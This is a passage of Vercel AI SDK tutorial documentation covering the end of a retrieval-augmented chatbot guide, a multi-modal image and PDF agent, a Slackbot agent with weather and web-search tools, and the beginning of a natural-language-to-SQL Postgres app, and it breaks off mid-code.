  const userQueryEmbedded = await generateEmbedding(userQuery);
  const similarity = sql<number>`1 - (${cosineDistance(
    embeddings.embedding,
    userQueryEmbedded,
  )})`;
  const similarGuides = await db
    .select({ name: embeddings.content, similarity })
    .from(embeddings)
    .where(gt(similarity, 0.5))
    .orderBy(t => desc(t.similarity))
    .limit(4);
  return similarGuides;
};

In this code, you add two functions:

generateEmbedding: generate a single embedding from an input string
findRelevantContent: embeds the user’s query, searches the database for similar items, then returns relevant items

With that done, it’s onto the final step: creating the tool.

Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  stepCountIs,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
      getInformation: tool({
        description: `get information from your knowledge base to answer questions.`,
        inputSchema: z.object({
          question: z.string().describe('the users question'),
        }),
        execute: async ({ question }) => findRelevantContent(question),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!

Conclusion

Congratulations, you have successfully built an AI agent that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your agent.

Troubleshooting Migration Error

If you experience an error with the migration, open your migration file (lib/db/migrations/0000_yielding_bloodaxe.sql), cut (copy and remove) the first line, and run it directly on your postgres instance. You should now be able to run the updated migration.

If you're using the Vercel setup above, you can run the command directly by either:

Going to the Neon console and entering the command there, or
Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.

More info.

title: Multi-Modal Agent description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK. tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']

Multi-Modal Agent

In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.

Multi-modal refers to the ability of the agent to understand and generate responses in multiple formats. In this guide, we'll focus on images and PDFs - two common document types that modern language models can process natively.

We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.

Prerequisites

To follow this quickstart, you'll need:

Node.js 18+ and pnpm installed on your local development machine.
A Vercel AI Gateway API key.

If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.

Create Your Application

Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.

Navigate to the newly created directory:

Install dependencies

Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.

<Tab>
  <Snippet text="bun add ai @ai-sdk/react" dark />
</Tab>

Configure your Vercel AI Gateway API key

Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.

Edit the .env.local file:

AI_GATEWAY_API_KEY=your_api_key_here

Replace your_api_key_here with your actual Vercel AI Gateway API key.

Implementation Plan

To build a multi-modal agent, you will need to:

Create a Route Handler to handle incoming chat messages and generate responses.
Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
Add the ability to upload images and PDFs and attach them alongside the chat messages.

Create a Route Handler

Create a route handler, app/api/chat/route.ts and add the following code:

import { streamText, convertToModelMessages, type UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Let's take a look at what is happening in this code:

Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customise the model's behaviour.
The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
Finally, return the result to the client to stream the response.

This Route Handler creates a POST request endpoint at /api/chat.

Wire up the UI

Now that you have a Route Handler that can query a large language model (LLM), it's time to setup your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.

Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}

      <form
        onSubmit={async event => {
          event.preventDefault();
          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }],
          });
          setInput('');
        }}
        className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
      >
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:

messages - the current chat messages (an array of objects with id, role, and parts properties).
sendMessage - function to send a new message to the AI.
Each message contains a parts array that can include text, images, PDFs, and other content types.
Files are converted to data URLs before being sent to maintain compatibility across different environments.

Add File Upload

To make your agent multi-modal, let's add the ability to upload and send both images and PDFs to the model. In v5, files are sent as part of the message's parts array. Files are converted to data URLs using the FileReader API before being sent to the server.

Update your root page (app/page.tsx) with the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';

async function convertFilesToDataURLs(files: FileList) {
  return Promise.all(
    Array.from(files).map(
      file =>
        new Promise<{
          type: 'file';
          mediaType: string;
          url: string;
        }>((resolve, reject) => {
          const reader = new FileReader();
          reader.onload = () => {
            resolve({
              type: 'file',
              mediaType: file.type,
              url: reader.result as string,
            });
          };
          reader.onerror = reject;
          reader.readAsDataURL(file);
        }),
    ),
  );
}

export default function Chat() {
  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
              return (
                <Image
                  key={`${m.id}-image-${index}`}
                  src={part.url}
                  width={500}
                  height={500}
                  alt={`attachment-${index}`}
                />
              );
            }
            if (part.type === 'file' && part.mediaType === 'application/pdf') {
              return (
                <iframe
                  key={`${m.id}-pdf-${index}`}
                  src={part.url}
                  width={500}
                  height={600}
                  title={`pdf-${index}`}
                />
              );
            }
            return null;
          })}
        </div>
      ))}

      <form
        className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
        onSubmit={async event => {
          event.preventDefault();

          const fileParts =
            files && files.length > 0
              ? await convertFilesToDataURLs(files)
              : [];

          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }, ...fileParts],
          });

          setInput('');
          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          accept="image/*,application/pdf"
          className=""
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

In this code, you:

Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
Create state to hold the input text, files, and a ref to the file input field.
Configure useChat with DefaultChatTransport to specify the API endpoint.
Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
Add a file input field to the form, including an onChange handler to handle updating the files state.

Running Your Application

With that, you have built everything you need for your multi-modal agent! To start your application, use the command:

Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.

Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!

Using Other Providers

With the AI SDK's unified provider interface you can easily switch to other providers that support multi-modal capabilities:

// Using Anthropic
const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  messages: convertToModelMessages(messages),
});

// Using Google
const result = streamText({
  model: 'google/gemini-2.5-flash',
  messages: convertToModelMessages(messages),
});

Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.

Where to Next?

You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.

title: Slackbot Agent Guide description: Learn how to use the AI SDK to build an AI Agent in Slack. tags: ['agents', 'chatbot']

Building an AI Agent in Slack with the AI SDK

In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.

Slack App Setup

Before we start building, you'll need to create and configure a Slack app:

Go to api.slack.com/apps
Click "Create New App" and choose "From scratch"
Give your app a name and select your workspace
Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
Install the app to your workspace (button under "OAuth Tokens" subsection)
Copy the Bot User OAuth Token and Signing Secret for the next step
Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"

Project Setup

This project uses the following stack:

Getting Started

Clone the repository and check out the starter branch

Install dependencies

Project Structure

The starter repository already includes:

Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
General utility functions (lib/utils.ts) including initial Exa setup
Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
An API endpoint (POST) for Slack events (api/events.ts)

Event Handler

First, let's take a look at our API route (api/events.ts):

import type { SlackEvent } from '@slack/web-api';
import {
  assistantThreadMessage,
  handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';

export async function POST(request: Request) {
  const rawBody = await request.text();
  const payload = JSON.parse(rawBody);
  const requestType = payload.type as 'url_verification' | 'event_callback';

  // See https://api.slack.com/events/url_verification
  if (requestType === 'url_verification') {
    return new Response(payload.challenge, { status: 200 });
  }

  await verifyRequest({ requestType, request, rawBody });

  try {
    const botUserId = await getBotId();

    const event = payload.event as SlackEvent;

    if (event.type === 'app_mention') {
      waitUntil(handleNewAppMention(event, botUserId));
    }

    if (event.type === 'assistant_thread_started') {
      waitUntil(assistantThreadMessage(event));
    }

    if (
      event.type === 'message' &&
      !event.subtype &&
      event.channel_type === 'im' &&
      !event.bot_id &&
      !event.bot_profile &&
      event.bot_id !== botUserId
    ) {
      waitUntil(handleNewAssistantMessage(event, botUserId));
    }

    return new Response('Success!', { status: 200 });
  } catch (error) {
    console.error('Error generating response', error);
    return new Response('Error generating response', { status: 500 });
  }
}

You then handle three types of events: app_mention, assistant_thread_started, and message:

For app_mention, you call handleNewAppMention with the event and the bot user ID.
For assistant_thread_started, you call assistantThreadMessage with the event.
For message, you call handleNewAssistantMessage with the event and the bot user ID.

Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.

The waitUntil Function

This means, your API endpoint will:

Immediately respond to Slack (within 3 seconds)
Continue processing the message asynchronously
Send the AI response when it's ready

Event Handlers

Let's look at how each event type is currently handled.

App Mentions

When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:

Checks if the message is from a bot to avoid infinite response loops
Creates a status updater to show the bot is "thinking"
If the mention is in a thread, it retrieves the thread history
Calls the LLM with the message content (using the generateResponse function which you will implement in the next section)
Updates the initial "thinking" message with the AI response

Here's the code for the handleNewAppMention function:

import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

const updateStatusUtil = async (
  initialStatus: string,
  event: AppMentionEvent,
) => {
  const initialMessage = await client.chat.postMessage({
    channel: event.channel,
    thread_ts: event.thread_ts ?? event.ts,
    text: initialStatus,
  });

  if (!initialMessage || !initialMessage.ts)
    throw new Error('Failed to post initial message');

  const updateMessage = async (status: string) => {
    await client.chat.update({
      channel: event.channel,
      ts: initialMessage.ts as string,
      text: status,
    });
  };
  return updateMessage;
};

export async function handleNewAppMention(
  event: AppMentionEvent,
  botUserId: string,
) {
  console.log('Handling app mention');
  if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
    console.log('Skipping app mention');
    return;
  }

  const { thread_ts, channel } = event;
  const updateMessage = await updateStatusUtil('is thinking...', event);

  if (thread_ts) {
    const messages = await getThread(channel, thread_ts, botUserId);
    const result = await generateResponse(messages, updateMessage);
    updateMessage(result);
  } else {
    const result = await generateResponse(
      [{ role: 'user', content: event.text }],
      updateMessage,
    );
    updateMessage(result);
  }
}

Now let's see how new assistant threads and messages are handled.

Assistant Thread Messages

When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:

Posts a welcome message to the thread
Sets up suggested prompts to help users get started

Here's the code for the assistantThreadMessage function:

import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';

export async function assistantThreadMessage(
  event: AssistantThreadStartedEvent,
) {
  const { channel_id, thread_ts } = event.assistant_thread;
  console.log(`Thread started: ${channel_id} ${thread_ts}`);
  console.log(JSON.stringify(event));

  await client.chat.postMessage({
    channel: channel_id,
    thread_ts: thread_ts,
    text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
  });

  await client.assistant.threads.setSuggestedPrompts({
    channel_id: channel_id,
    thread_ts: thread_ts,
    prompts: [
      {
        title: 'Get the weather',
        message: 'What is the current weather in London?',
      },
      {
        title: 'Get the news',
        message: 'What is the latest Premier League news from the BBC?',
      },
    ],
  });
}

Direct Messages

For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:

Verifies the message isn't from a bot
Updates the status to show the response is being generated
Retrieves the conversation history
Calls the LLM with the conversation context
Posts the LLM's response to the thread

Here's the code for the handleNewAssistantMessage function:

import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

export async function handleNewAssistantMessage(
  event: GenericMessageEvent,
  botUserId: string,
) {
  if (
    event.bot_id ||
    event.bot_id === botUserId ||
    event.bot_profile ||
    !event.thread_ts
  )
    return;

  const { thread_ts, channel } = event;
  const updateStatus = updateStatusUtil(channel, thread_ts);
  updateStatus('is thinking...');

  const messages = await getThread(channel, thread_ts, botUserId);
  const result = await generateResponse(messages, updateStatus);

  await client.chat.postMessage({
    channel: channel,
    thread_ts: thread_ts,
    text: result,
    unfurl_links: false,
    blocks: [
      {
        type: 'section',
        text: {
          type: 'mrkdwn',
          text: result,
        },
      },
    ],
  });

  updateStatus('');
}

With the event handlers in place, let's now implement the AI logic.

Implementing AI Logic

The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.

Here's how to implement it:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}`,
    messages,
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

This basic implementation:

Uses the AI SDK's generateText function to call Anthropic's claude-sonnet-4.5 model
Provides a system prompt to guide the model's behavior
Formats the response for Slack's markdown format

Enhancing with Tools

The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:

import { generateText, tool, ModelMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
import { exa } from './utils';

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}
    - Always include sources in your final response if you use web search.`,
    messages,
    stopWhen: stepCountIs(10),
    tools: {
      getWeather: tool({
        description: 'Get the current weather at a location',
        inputSchema: z.object({
          latitude: z.number(),
          longitude: z.number(),
          city: z.string(),
        }),
        execute: async ({ latitude, longitude, city }) => {
          updateStatus?.(`is getting weather for ${city}...`);

          const response = await fetch(
            `https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
          );

          const weatherData = await response.json();
          return {
            temperature: weatherData.current.temperature_2m,
            weatherCode: weatherData.current.weathercode,
            humidity: weatherData.current.relativehumidity_2m,
            city,
          };
        },
      }),
      searchWeb: tool({
        description: 'Use this to search the web for information',
        inputSchema: z.object({
          query: z.string(),
          specificDomain: z
            .string()
            .nullable()
            .describe(
              'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
            ),
        }),
        execute: async ({ query, specificDomain }) => {
          updateStatus?.(`is searching the web for ${query}...`);
          const { results } = await exa.searchAndContents(query, {
            livecrawl: 'always',
            numResults: 3,
            includeDomains: specificDomain ? [specificDomain] : undefined,
          });

          return {
            results: results.map(result => ({
              title: result.title,
              url: result.url,
              snippet: result.text.slice(0, 1000),
            })),
          };
        },
      }),
    },
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

In this updated implementation:

You added two tools:
- getWeather: Fetches weather data for a specified location
- searchWeb: Searches the web for information using the Exa API
You set stopWhen: stepCountIs(10) to enable multi-step conversations. This defines the stopping conditions of your agent, when the model generates a tool call. This will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.

How It Works

When a user interacts with your bot:

The Slack event is received and processed by your API endpoint
The user's message and the thread history is passed to the generateResponse function
The AI SDK processes the message and may invoke tools as needed
The response is formatted for Slack and sent back to the user

The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:

Recognize this as a weather query
Call the getWeather tool with London's coordinates (inferred by the LLM)
Process the weather data
Generate a final response, answering the user's question

Deploying the App

Install the Vercel CLI

Deploy the app

Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables

SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key

Head back to the https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.

https://your-vercel-url.vercel.app/api/events

On the Events Subscription page, subscribe to the following events.
- app_mention
- assistant_thread_started
- message:im

Finally, head to Slack and test the app by sending a message to the bot.

Next Steps

You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:

Add memory for specific users to give the LLM context of previous interactions
Implement more tools like database queries or knowledge base searches
Add support for rich message formatting with blocks
Add analytics to track usage patterns

title: Natural Language Postgres description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language. tags: ['agents', 'next', 'tools']

Natural Language Postgres Guide

In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.

The application will:

Generate SQL queries from a natural language input
Explain query components in plain English
Create a chart to visualise query results

You can find a completed version of this project at natural-language-postgres.vercel.app.

Project setup

This project uses the following stack:

Next.js (App Router)
AI SDK
OpenAI
Zod
Postgres with Vercel Postgres
shadcn-ui and TailwindCSS for styling
Recharts for data visualization

Clone repo

To focus on the AI-powered functionality rather than project setup and configuration we've prepared a starter repository which includes a database schema and a few components.

Clone the starter repository and check out the starter branch:

Project setup and data

Let's set up the project and seed the database with the dataset:

Install dependencies:

Copy the example environment variables file:

Add your environment variables to .env:

OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."

This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root

Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file

About the dataset

The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):

Company name
Valuation
Date joined (unicorn status)
Country
City
Industry
Select investors

Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:

Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.

Start the development server:

Your application should now be running at http://localhost:3000.

Project structure

The starter repository already includes everything that you will need, including:

Database seed script (lib/seed.ts)
Basic components built with shadcn/ui (components/)
Function to run SQL queries (app/actions.ts)
Type definitions for the database schema (lib/types.ts)

Existing components

The application contains a single page in app/page.tsx that serves as the main interface.

Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.

When you submit a query:

The suggested queries section disappears and a loading state appears
Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
Below that is an empty results area with "No results found" (results.tsx)

After you implement the core functionality:

The results section will display data in a table format
A toggle button will allow switching between table and chart views
The chart view will visualize your query results

Let's implement the AI-powered functionality to bring it all together.

Building the application

As a reminder, this application will have three main features:

Generate SQL queries from natural language
Create a chart from the query results
Explain SQL queries in plain English

Let's start with generating a SQL query from natural language.

Generate SQL queries

Providing context

For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:

Schema information
Example data formats
Available SQL operations
Best practices for query structure
Nuanced advice for specific fields

Let's write a prompt that includes all of this information:

You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:

unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

Only retrieval queries are allowed.

For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').

Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (ie. what is Vercel's valuation would select company and valuation').

The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health

If the user asks for a category that is not in the list, infer based on the list above.

Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.

If the user asks for 'over time' data, return by year.

When searching for UK or USA, write out United Kingdom or United States respectively.

EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.

There are several important elements of this prompt:

Schema description helps the model understand exactly what data fields to work with
Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted

This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.

Create a Server Action

With the prompt done, let's create a Server Action.

Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).

Add a new action. This action should be asynchronous and take in one parameter - the natural language query.

/* ...rest of the file... */

export const generateQuery = async (input: string) => {};

/* ...other imports... */
import { generateObject } from 'ai';
import { z } from 'zod';

/* ...rest of the file... */

export const generateQuery = async (input: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
      schema: z.object({
        query: z.string(),
      }),
    });
    return result.object.query;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update the frontend

Import the generateQuery function and call it with the user's input.

/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';

/* ...rest of the file... */

const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Explain SQL Queries

Let's craft a prompt for the explain query functionality:

You are a SQL (postgres) expert. Your job is to explain to the user write a SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.

Create a Server Action

Add a new Server Action to generate explanations for SQL queries.

This action takes two parameters - the original natural language input and the generated SQL query.

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
    });
    return result.object;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

This action uses the generateObject function again. However, you haven't defined the schema yet. Let's define it in another file so it can also be used as a type in your components.

Update your lib/types.ts file to include the schema for the explanations:

import { z } from 'zod';

/* ...rest of the file... */

export const explanationSchema = z.object({
  section: z.string(),
  explanation: z.string(),
});

export type QueryExplanation = z.infer<typeof explanationSchema>;

// other imports
import { explanationSchema } from '@/lib/types';

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
